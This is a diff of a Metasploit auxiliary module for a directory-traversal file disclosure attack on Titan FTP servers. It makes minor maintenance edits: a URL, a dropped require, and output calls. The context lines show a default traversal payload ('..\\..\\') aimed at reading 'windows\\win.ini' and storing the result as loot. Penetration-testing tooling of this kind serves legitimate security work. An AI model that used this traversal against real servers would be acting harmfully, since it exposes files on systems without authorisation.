@@ -1,12 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Ftp
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
@@ -46,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(21),
         OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),
         OptString.new('PATH', [ true, "Path to the file to disclose, releative to the root dir.", 'windows\\win.ini'])
-      ], self.class)
+      ])
   end
 
 
@@ -99,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
 
     fname = datastore['PATH'].gsub(/[\/\\]/, '_')
     p = store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)
-    print_status("Saved in: #{p}")
+    print_good("Saved in: #{p}")
     vprint_status(file_data.inspect)
 
     disconnect
@@ -124,5 +121,4 @@ class MetasploitModule < Msf::Auxiliary
     percent = "%3.2f%%" % done.to_f
     print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total])
   end
-
 end
